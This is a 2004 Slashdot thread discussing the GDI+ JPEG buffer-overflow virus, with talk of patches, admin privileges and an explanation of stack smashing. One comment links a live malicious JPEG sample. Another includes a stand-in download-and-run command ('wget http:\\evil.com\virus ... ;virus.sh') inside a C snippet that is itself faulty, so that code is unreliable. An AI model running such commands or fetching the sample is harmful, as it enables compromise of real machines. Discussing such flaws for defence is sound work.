First JPEG Virus Posted To Usenet

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

That's pretty amazing.

[autopr0n]

Congrats, microsoft, for making just about every filetype unsafe.

The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.

Re:That's pretty amazing.

[FooAtWFU]

Any recent version certainly does so.

Re:That's pretty amazing.

[mini+me]

Hopefully mozilla decodes the jpgs itself before rendering them on windows.

It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

Re:That's pretty amazing.

[ConceptJunkie]

This reminds me of my first thought when I saw Windows 95 message "It is now safe to turn off your computer."

Which was, "However it is no longer safe to turn on your computer."

Quality freefall.

Really, how much new useful functionality has MS provided in the last 5 years? It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory. Functionality increases at best in a linear fashion, while system requirements increase at a geometric rate. Software eats more of your computer and offers less in return.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

Maybe they should shut down for a year. Take all the gigabyte-gobbling shit they've written for the last 10 years and turn it into useful code with no new functionality. Returning with the same stuff they have now, but with little or no security issues would win them more customers than their current monopolistic policies and FUD spreading ever will.

Really, what else could they possibly do besides introduce a bunch of bloated new technologies for doing the same damn thing we all wrote for ourselves years ago, but without all the MS lock in and huge learning curve?

I have to ask, what has MS done that is actually useful since Windows 2000?

Re:That's pretty amazing.

[datawar]

Are you serious? Of course Slashdot covered those stories too.

Critical Mozilla, Thunderbird Vulnerabilities

CERT Warns Of Multiple Vulnerabilities In Libpng

Re:That's pretty amazing.

[craXORjack]

It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory.

I'm glad I'm not the only one who noticed this. btw cpu's are way faster than 10x faster. In 1994 I could only afford a 386sx at 16Mhz. Not only is the clock speed faster but the chip has gone through several major revisions. Yet I think that 386sx booted up faster and ran Lotus and Wordperfect under DOS just as fast as anything out there on Windows today. Of course there are some advantages to windows but speed sure isn't one of them!

Re:That's pretty amazing.

[ConceptJunkie]

The real kicker was when I switched to Outlook 2003 from Outlook Express. From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE. It was absurd. Oh, yeah, and the fact that an O2k3 data store can't be bigger than about 1GB to 1.5GB before it starts losing messages (I couldn't believe this at first but it was confirmed by two people with much more MS experience than me). I switched to Thunderbird around 0.5 and haven't given it a second thought.

Now here's a case where the MS software really was well-designed and easy to use (from a UI standpoint), but the grotesque slowness of the app killed it for me.

In 1994, I had a 50MHz 486SX... I didn't buy a Pentium 100 until '96, so you're right. Clock speed is more like 40 - 60 times faster (and thanks to wonders of CISC, performance is more than that). And disk space has increased for me by 3 orders of magnitude.

I seem to recall MicroCenter or CompUSA having a "Buck-a-Meg" sale and I bought a 340MB drive for $340, bringing my total to a whopping 580MB. Now I've got about 600GB over about 4 machines, maybe more since each box is crammed full of old drives ranging from 7GB to 250GB etc in addition to a few bigger drives.

I used to hate how my Amiga took like 3 minutes to boot back in the late 80's. Windows 2000 on a machine that was 100 times faster took around the same time. XP is much better, but still, there are times when I have a lot of apps loaded and it just seems to go out to lunch for several seconds before anything responds. And don't get me started on the launch time for Word 2003...

Re:That's pretty amazing.

[Doyle]

I have to ask, what has MS done that is actually useful since Windows 2000?

You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

Oh, wait - that was the Romans :P

Re:That's pretty amazing.

[HermanAB]

No dammit, if MS fix their code it will kill the PC support industry and another million wannabe geeks will be out of work...

Re:That's pretty amazing.

[ConceptJunkie]

What has Open Source done in the last 4 years?

Gone from Linux 2.0 to Linux 2.4 with all the huge improvements that go with it.

Built a world-class browser from scratch. Ditto for e-mail.

Developed half the apps I use under Windows.

(And while I like the Windows development platform, ironically, I still use VC++ 6 because that's what all my clients use and want.)

: What have other large companies done in the past 4 years?

Sun: Got in a pissing match with MS over Java. Won, or lost... heck I don't even know (or care).

Oracle: Continues to resent losing a competitive pissing match with MS despite having a superior product

Corel: Tried to enter a pissing match with MS with 1/100th of the resources... failed miserably and sold everything

Apple: Continued their pissing match with MS over usability (and is still losing the war despite winning all the battles)

IBM: Set themselves up for a pissing match with MS by backing Linux.

SCO: Pissed off everyone.

Enron: Pissed on everyone.

Novell: Pissed themselves.

Re:That's pretty amazing.

[IchBinEinPenguin]

Returning with the same stuff they have now, but with little or no security issues

Sorry, that won't work.

Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)

Re:That's pretty amazing.

[Tony-A]

"It is now safe to turn off your computer." ... Quality freefall.

It's related.
There is an arrogance that Microsoft knows best that is implicit in that statement. Whether or not it is actually safe to turn off the computer is very much outside of Microsoft's knowledge. In fact the safest thing to do when a system is acting bonkers is to hit reset or the power switch on old computers or pulling the power plug or removing the battery on new compouter where the power switch is no longer functional. The reasoning goes that when the system has its brains scrambled it desperately wants to write those scrambled brains to disk and thus perpetuate the scramble.

Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

One whole month, Well golly gee! Actually one month would be enough to stop hiding stuff and never under any circumstance use or require scripts or ActiveX controls for anything remotely related to security.
[x] Hide files extension for known file types.
That by itself is enough to wreck any attempts at achieving security. The message is loud and clear. Linux worms never seem to get anywhere. People see them and react violently to anything sneaking around trying to be invisible.

Task Manager doesn't show everything. Microsoft Windows comes with a pre-installed root kit!

Re:Anyone have a working copy?

[JS_RIDDLER]

In the article the virus.txt has a jpeg sample in code.

Just begging to be sued

[TheSpoom]

printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | September, 23, 2004 |\n");

Geez, this guy really wants to be sued and/or arrested.

Re:Just begging to be sued

[Anonymous+Freak]

This is the guy who published the "proof of concept" exploit, not the virus that is in the wild. He is as likely to be sued as "DVD Jon" would be sued for breaking CSS. Oh, wait.....

Re:Just begging to be sued

[d_jedi]

I got my lawyer on the phone, but he couldn't look up any legal info.. seems he was viewing some p[r]on, and all of the sudden, his computer stopped working..

Damn Jay Peg with his viruses..

Re:Just begging to be sued

[lukewarmfusion]

"Can't arrest someone for merely writing a piece of code."

coughcoughpatriotactcoughcough

Re:Just begging to be sued

[toetagger1]

Google finds a whole lot of exploids for this guy. Ranging from apache to AIM away message buffer over runs.

Can be prevented...

[pbranes]

Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.

Re:Can be prevented...

[Zocalo]

Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

Re:Can be prevented...

[Saratoga+C++]

Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

So buyer beware.

Re:Can be prevented...

[EnronHaliburton2004]

Since this virus also affects MS Office, I bet it may be propogated that way.

Most people update their system via windowsupdate.microsoft.com . However, despite the rumors, Windowsupdate does NOT update your MS Office suite.

Very few people go the extrastep to use the MS office updater.

Re:Can be prevented...

[glob]

> Sorry to burst your bubble dude, but that patch
> only fixed the system's instance of GDI+

while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

Re:Can be prevented...

[dabug]

From Tom Liston's site:

"Ignore files in directories like Windows\$NtUniinstallKBxxxxx\ and Windows\WinSxS. These are old versions left behind for uninstal purposes."

Re:Can be prevented...

while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

Re:Can be prevented...

[Zocalo]

Not strictly true. "WinSxS" is short for "Windows Side-by-Side" which according to my research over the last few days is a horrible hack to try and allow different apps to use different versions of the same DLL on the same system. So, suppose we have three versions of the DLL; v1 and v2 are vulnerable, v3 is not. Windows comes with v2, but I install a graphics viewer that requires and installs v1 as part of its install - v1 goes into "WinSxS". When I install the MS patch, the vulnerable v2 version is replaced with the secure v3 and MS tells me all is well, but if I open a bad JPEG with my graphics viewer, it loads the v1 DLL and my PC belongs to someone else.

Re:Anyone have a working copy?

[tuxedobob]

Don't want sample code. Want JPEG.

Re:Goatse

[Molina+the+Bofh]

It'll leave your backdoor wide open.

The real question...

[comwiz56]

Does this affect Firefox?

Well...

[Pantero+Blanco]

It was only a matter of time. Now we wait for a dozen variants to pop up.

"This could possibly be the worst viruses yet!"

Hm...maybe when he started typing there was only one and it spread during the sentence?

Nothing's safe anymore

[phantomAI]

I guess those nude pictures of Anna Kournikova could indeed be a virus.

Re:Nothing's safe anymore

[bergeron76]

So does this qualify it as a Sexually Transmitted Disease (STD)?!?

Drat!!!

I don't see why this is a problem

[bconway]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Re:I don't see why this is a problem

[gl4ss]

why it's a problem? because people do run with admin priviledges.

I hate to break it to you but normal people don't know or care about things like that.
.

Re:I don't see why this is a problem

[rufo]

Yeah, that's all well and good - except for the fact that Windows sets up users by default as administrators, as does every OEM to ship a Windows PC, and without any explanation as to why this is or why it might just be a bad idea.

Until Microsoft stops shipping the OS wide-open for anyone to do anything they want, these kind of attacks will continue. Apple's gotten it much more right in this regard - even as a Mac user I don't think Mac OS X is particularly more secure then any other *nix or even Windows (just less analyzed), but at least Apple doesn't ship with any services turned on or allow admin users willy-nilly access over the entire system (most admin settings and files require password confirmation before continuing - not foolproof by any means but a huge step in the right direction), as do most good Unices these days.

But of course not Windows. ;-)

Re:I don't see why this is a problem

[Etcetera]

At the risk of being kicked off Slashdot for being a devil's advocate... ;)

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

Think bigger. Think to the future. "Don't log in as root/Don't be an administrator." is NOT an answer. Mac OS 9 and below operated by default in a single-user mode without *any* authentication necessary to make changes and I can list the successful viruses/exploits (especially remote exploits) by hand on a single sheet of paper.

Artificial permission models (where "artificial" means "not needed by the environment") are not panaceas and aren't excuses for poor OS design.

Re:I don't see why this is a problem

[Waffle+Iron]

If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

Re:I don't see why this is a problem

[HuguesT]

All well and good but many things don't work in windows if you are not an administrator.

I find it incredible that reputable developers like ID software for example require the latest demo of Doom 3 to be *installed* AND *run* as an administrator. The demo readme states this explicitely.

Yes I do know about "Run As" but what are these people thinking? Administrator is for administrative tasks, not for playing games.

No wonder XP is such a debacle area security wise.

Re:I don't see why this is a problem

[JoeBuck]

We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator. The reason is that the games were written in the Windows 95 era; they want to do direct access to everything, and that takes privileges that a non-admin Windows XP user does not have.

This kind of thing is common, and it forces a lot of people to run with elevated privilege. This is the price of legacy. Of course, Microsoft could have provided some mechanism to run the older programs without privilege (say, with some kind of virtual machine setup), but they probably figured that if they didn't do the work, it would be easier to sell new XP versions of all the apps.

Re:I don't see why this is a problem

[jpop32]

We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator.

As a producer of children computer games, I have encountered those problems. Most are solved by a couple of registry/security policy edits. Try enabling 'Restrict CD-ROM Access to locally logged-on user only' in Local Security Policy (found in administrative tools). That should cure a lot of them.

Careful assignment of permissions to ceratin files/directories would probably take care of others. Check out www.sysinternals.com for tools which can help you track down what the program is trying to open and what it fails to do.

Re:I don't see why this is a problem

[CheechBG]

I don't know about you, but I don't want to have to use the Run As command every 15 minutes just to do something simple like burn a CD (need Admin privs) or run a game. This is my PC, I administrate it, so I run with Admin privledges. As such, it then becomes MY responsibility to make sure that bullshit stuff doesn't find it's way over. This is why I bother to run an AV program, have Spybot tell me whenever something is trying to write to the registry, and so on.

At work, however, is a different story. I do have domain access, but I never log in as the domain admin unless I need to do some administration. I did, however, grant myself local admin rights on my machine for the same reasons above. I don't have a problem with spyware, adware, viruses, or anything.

clamav and nav detect it

[Indy1]

clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND

----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)

also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.

Re:Anyone have a working copy?

http://easynews.com/test/possiblevirus.jpg.gz

Got the link from bugtraq a few hours ago.

Imagine for a moment....

[Hardwyred]

your neighbors open accesspoint, a copy of Airpwn and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.

Screenshots...

[tajmorton]

No Screenshots, please!

Re:Anyone have a working copy?

[Anonymous+Freak]

Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

Graphic Converter complains that "Some parts of the file may be missing."

Safari displays a blank page, with no errors.

In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

(The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

alt.binaries.erotica.beanie-babies

[drachenfyre]

Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

Re:alt.binaries.erotica.beanie-babies

I take offence at your narrow-mindedness.

Re:alt.binaries.erotica.beanie-babies

[marko123]

Were you around during the height of the popularity of alt.tasteless.hamster.duct_tape or alt.swedish.chef.bork.bork.bork?

Those were the days. Anyone go to Level 17 on gopher?

Eek!

[StevenHenderson]

This could possibly be the worst viruses yet!

These could be the worst grammar too!!!

Not particularly well coded

[crazyray]

If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.

Re:Not particularly well coded

[djeca]

Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

Re:Anyone have a working copy?

[Tyrdium]

Heh, Norton Antivirus wouldn't even let me try it. The heuristics grabbed it before it was even on my desktop. Now [i]that[/i] is impressive.

The answer is...

[Leomania]

yes, if you haven't updated to the latest version.

See this Slashdot thread.

- Leo

Re:The answer is...

[Leomania]

Sorry, that should be "yes to a similar vulnerability, but not to this exact one, unless you've upgraded to the newest version."

Must hit "Preview" to check those links, not "Submit"...

- Leo

Even more evil ...

[gregoryl]

put the image on doubleclick.net

WAV files

[mosel-saar-ruwer]

Last weekend, I was messing around with writing my own WAV files [in conjunction with a LabVIEW project], and, oddly enough, M$FT's wmplayer.exe was the ONLY media player that checked the file for integrity.

Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.

I bet this sort of thing is a helluva lot more endemic than people realize.

Re:Anyone have a working copy?

[Yaztromo]

I want to see what GraphicConverter does with this.

Absolutely nothing. The file is only 8KB in size, and doesn't appear to contain any actual image data. Loading it up in GraphicConverter v4.9 over here (and Preview, and a number of other tools) just reports that the image file is corrupt.

Yaz.

Re:Anyone have a working copy?

[tuxedobob]

Thanks! Downloaded and opened!

The joys of keeping a campus virus-free

[iamlucky13]

Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.

Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

Re:The joys of keeping a campus virus-free

[DannyiMac]

I work for the University of Kentucky ResNet and when a student's computer appears to exhibit viral activity they will be blocked by their IP address by the Communications department. Then the student calls and we check if the IP is blocked or not. If they are, we send them to the anti-virus web page--the only web page the student can access from their computer. Once they install the virus software the university supplies, remove the virus(es), and upgrade to the latest service pack for their version of Windows 2000/XP, we unblock them. If they lie to us and don't do this they simply get blocked again. This is how UK controls its virus problem and I think it's a good method. Students also get blocked for other reasons as well, such as port scanning for it's possible virus behavior. Lastly, a DMCA complaint, where the student gets caught sharing copyrighted materials by organizations outside of UK (I don't think the RIAA has gotten anyone on campus yet, however).

Limited Accounts?

[WoTG]

Anyone know if this exploit can be done when the user is using a Windows Limited account?

Re:Limited Accounts?

[mtnharo]

From the sound of things, the exploit will be triggered, but this particular piece of code won't be able to do much, since it tries to install software that requires an Admin level account. Having a limited account won't prevent the user from running the exploit code, but it does prevent the exploit from leading to a system-level breach, unless some of privilege-escalation exploit is included as well.

Re:Anyone have a working copy?

[rainman_bc]

Mine too... Totall impressive. What's even more impressive is the ability to use standard html tags on slashdot :)

Microsoft Patch

[bcreane]

FYI, here's the fix from M$ for this exploit: Security Bulletin

God dammit!

Why doesn't slashdot allow you to post images! :)

Re:God dammit!

[Dorothy+86]

because those of us who have remained goatse free would like to keep it that way :-P

(yes, I know you're being silly, but what the hell :))

Re:Stop downloading porn?

[base3]

Stop being a tease and saying we can't have pr0n and then using language like "patches the hole." Thank you.

NX Protection?

[rsmith-mac]

Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.

Re:NX Protection?

I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:

char overflowed[10];
char command="echo \"some silly command\"";

int main(){
strcpy(argv[1], overflowed);
exec(command);
}

We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.

Sex!

[InfiniteWisdom]

What, now you can't even WATCH sex without protection?

Lament from an old-timer

[bigberk]

In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.

In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.

Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?

i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.

Re:Anyone have a working copy?

[Three+Headed+Man]

I extracted the bad code, but I'm having trouble getting it to run in WINE.

Just one more reason Linux isn't ready for the desktop.

Crappy MS "GDI Detection Tool"

[whoever57]

I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparanetly the system is vulnerable, but there is no way to fix it. Wonderful!

This'll be good for catching downloaders . . .

[base3]

. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .

Re:This'll be good for catching downloaders . . .

[ceeam]

Well - how many people viewed the certain hello.jpg image willingly and knowing what they are going to find? How difficult it would be for me to dupe you or someone else to load the image you mention if I find its URL?

Hacked CNN Advertisments

[8400_RPM]

So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

Millions of instant zombies.

Thats f*cking scarry....

Re:Hacked CNN Advertisments

[Wes+Janson]

If I understood the article correctly, you have to actually save the virus file, and then try to view it. Only then will it infect. From what I read, it would seem just opening a webpage with the "image" on it would not infect a computer.

The tech note at MS tells all

Claims Win 98SE is not affected! Great, all MS users can take a bold step back.

TechNet Home Security Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) Issued: September 14, 2004 Updated: September 21, 2004 Version: 1.2 Summary Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components. Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical Recommendation: Customers should apply the update immediately. Security Update Replacement: None Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information. Tested Software and Security Update Download Locations:

Affected Software:

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987) Microsoft Windows Server(TM) 2003 - Download the update (KB833987) Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987) Microsoft Office XP Service Pack 3 - Download the update (KB832332) Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332) Microsoft Office XP Software: Outlook® 2002 Word 2002 Excel 2002 PowerPoint® 2002 FrontPage® 2002 Publisher 2002 Access 2002 Microsoft Office 2003 Software: Outlook® 2003 Word 2003 Excel 2003 PowerPoint® 2003 FrontPage® 2003 Publisher 2003 Access 2003 InfoPath(TM) 2003 OneNote(TM) 2003 Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931) Microsoft Project 2003 (all versions) - Download the update (KB838344) Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932) Microsoft Visio 2003 (all versions) - Download the update (KB838345) Microsoft Visual Studio .NET 2002 - Download the update (KB830348) Microsoft Visual Studio .NET 2002 Software: Visual Basic .NET Standard 2002 Visual C# .NET Standard 2002 Visual C++ .NET Standard 2002 Microsoft Visual Studio .NET 2003 - Download the update (KB830348) Microsoft Visual Studio .NET 2003 Software: Visual Basic .NET Standard 2003 Visual C# .NET Standard 2003 Visual C++ .NET Standard 2003 Visual J# .NET Standard 2003 The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461) Microsoft Picture It!® 2002 (all versions) - Download the update Microsoft Greetings 2002 - Download the update Microsoft Picture It! version 7.0 (all versions) - Download the update Microsoft Digital Image Pro version 7.0 - Download the update Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update Microsoft Digital Image Pro version 9 - Download the update Microsoft Digital Image Suite version 9 - Download the update Microsoft Producer for Microsoft Office PowerPoint (all versions) Microsoft Platform SDK Redistributable: GDI+ - Download the update Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office

Re:Goatse

[devilspgd]

If the editors can dupe, why not the posters?

Re:bug month

[ConceptJunkie]

"Quality freefall"? Not really. They've always produced third tier code.

I dunno. NT 3.51 always seemed to be rock-frickin'-solid, but then I didn't use it for long before NT 4 came out.

Of course, Windows 95 was stillborn and they kept pumping the corpse full of formaldehyde for 5 years for they finally let it rot in peace, but the NT branch was really good until they started making every app they wrote effectively part of the core OS.

Remember when NT ran on 4 different processor architectures and Win32 was just one API on top of the kernel in addition to Posix and OS/2? Now that IE and WMP are practically part of the kernel it seems so long ago, and yet, in a sense, it was far more advanced because it was modular enough and clean enough to be ported.

Re:Anyone have a working copy?

[boisepunk]

GIMP under Win32 gives error "Improper call to JPEG library in state 201".

I'm not going to try it under internet exploiter or mspaint. ...just trying to be informative

Re:Anyone have a working copy?

[HermanAB]

Yah, Linux is boring - it just works...

Windows Users have all the fun!

Anyone think it's interesting...

[JohnsonWax]

That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?

Apple really has come a long way around here, eh?

Re:Anyone think it's interesting...

[Yaztromo]

Apple really has come a long way around here, eh?

For the record, I bought my first Mac (a 12" PowerBook G4) this past spring based in significant part on all the good things I had read about Apple's latest offerings here on /. .

Yaz.

Re:Anyone have a working copy?

[Paul+d'Aoust]

In all seriousness, I downloaded an example of an Evil JPEG to my Linux computer and tried opening it up in various programs.

• Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
• Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
• Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
• Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

mind you, who would ever write an exploit that would only spread to five percent of the computers in the world? ;-)

How do they reencode?

[SuperKendall]

MSN reencodes all images to PNG

That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).

Re:Anyone have a working copy?

Yeah but Linux users make up 90% of the porn-downloading population; therefore, there is an elevated risk.

Re:how and what

[MillionthMonkey]

you're a goddamn idiot. a suitably constructed jpeg will cause an overflow in the gdi+ library which ie and most msft programs use to render jpegs, when that happens the jpeg can be made such that the overflow will cause virus code to be loaded. god you're an idiot.

Jesus, an obvious end user asks a perfectly legitimate question and you call him an idiot for being surprised by the notion of a hostile JPEG- something that should rightfully amaze everybody. I doubt he understood your high level description. To the grandparent: here is a meandering crappy description of how a buffer overflow attack works:

A function call, in C, pushes the current program counter on the stack. Then it pushes the arguments onto the stack, and control jumps to the function which pops the arguments off the stack and does whatever with them. At the end it invokes a RET instruction that pops the program counter back off the stack and control jumps to the address there (to the point right after the CALL). These are just normal C calling conventions.

Variables defined in the function are stored on the stack. If a string like a URL (for example) needs to be defined, a buffer is allocated for it there. When the function returns, the space is automatically deallocated, the RET pops the program counter off the stack, and the function call returns. By default no bounds checking is done on data stored in these buffers. Some library functions, like gets(), don't do bounds checking. They can't, since they don't know the buffer size and would need to have it provided as an argument. Newer, safer versions exist that do take buffer size arguments, but that means these aren't the same library functions anymore. (FWIW the gets() call takes a pointer to a buffer of unknown size as an argument, reads a newlined string from stdin into the buffer, and returns the buffer pointer that was passed to it.)

It's up to the programmer to do bounds checking if he uses library calls vulnerable in this way. But this is extra work, and people are lazy. It's easier to just allocate a big, big buffer that's probably larger than you'll ever need, that "no reasonable URL" will ever exceed. So the programmer allocates a fixed 10K buffer on the stack and passes its address to a library function like gets().

The attacker gains control in these situations by creating a program input like a long, carefully crafted URL, slightly longer than 10K, that overflows the buffer inside the library function. The goal is to overwrite the return address on the stack with an address that's within the buffer. In the case of the Code Red worm, someone meticulously put together a URL that attacked an obscure ISAPI routine, and not only overwrote the return address, but also had machine code instructions waiting at the replacement address within the buffer- encoded right into the damn URL! (The buffer has been deallocated at this point, but hasn't been zeroed, so it's still there.)

It's harder to explain with a JPEG than with a URL. But a JPEG contains variable length data structures that are read into buffers on the stack. Someone writing the JPEG decoder forgot to do a bounds check- and so a mundane function for decoding JPEGs never returns. Instead it jumps into an endless loop that's been placed within the image buffer by the attacker.

So yes it is a bit like running an .EXE file, except for the fact that the code is hiding inside what is supposed to be data, not code, and it gains control of the CPU by smashing the stack.

Older versions of Notepad gagged on files larger than 64K, which seems suspicious. It's theoretically possible that a vulnerability could exist even in a text editor like Notepad allowing a carefully constructed .TXT file to execute arbitrary code. Who knows?

Re:how and what

[MillionthMonkey]

Here are the low level details of the JPEG exploit:

